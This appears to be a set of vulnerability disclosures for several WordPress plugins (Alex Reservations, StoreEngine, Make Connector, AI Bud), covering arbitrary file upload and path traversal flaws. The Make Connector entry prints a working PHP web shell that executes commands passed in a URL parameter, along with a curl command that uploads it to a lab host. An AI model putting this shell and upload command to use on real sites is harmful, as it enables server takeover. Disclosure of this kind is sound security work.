The WordPress Alex Reservations plugin (versions 2.2.3 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress administrators to upload malicious PHP files to the server, potentially leading to remote code execution.
TL;DR Exploits
A POC CVE-2025-12399.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
The vulnerability exists in the UploadFileController.php file at the /wp-json/srr/v1/app/upload/file endpoint. The upload functionality lacks proper file validation and only performs basic filename sanitization using a regex pattern. This allows authenticated WordPress administrators to upload arbitrary files, including PHP files that can be executed on the server.
The StoreEngine plugin contains a vulnerability in it’s CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. The vulnerability stems from two security flaws: (1) the CSV import endpoint lacks proper file validation checks, permission checks, and only relies on nonce verification for security, and (2) the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. This combination allows any authenticated user to extract the nonce from frontend pages and use it to upload PHP web shells via the storeengine_csv/import endpoint, effectively granting subscriber+ users the ability to execute arbitrary code on the server.
The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, WordPress configuration files, and plugin source code. The vulnerability stems from the storeengine_csv/file_download endpoint lacking proper path sanitization and only relying on nonce verification for security, while the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. Note: This vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once enabled, this combination allows any authenticated user to extract the nonce from frontend pages and use it to download any file on the server via path traversal attacks, effectively granting subscriber+ users access to sensitive system and application files.
The Make Connector plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
TL;DR Exploits
cat << 'EOF' > shello.php
<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
?>
EOFcurl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
-H "IWC-API-KEY: YOURFRIENDLYKEYHERE"\
-F "file=@shello.php"\
-F "title=Hacker World"\
-F "description=A test file"\
-F "caption=Hacker Caption"\
Leveraging the shell once it’s in the uploads folder:
The AI Bud plugin exposes a REST API endpoint /wp-json/ai-buddy/v1/wp/attachments that allows uploading files to the WordPress media library. The endpoint’s file logic contains file renaming functionality that triggers after file type validation, and allows the attacker to rename the uploaded file to any extension (including.php) allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
TL;DR Exploits
A POC cve-2025-23968.py is provided to demonstrate an administrator uploading a web shell named shell.php.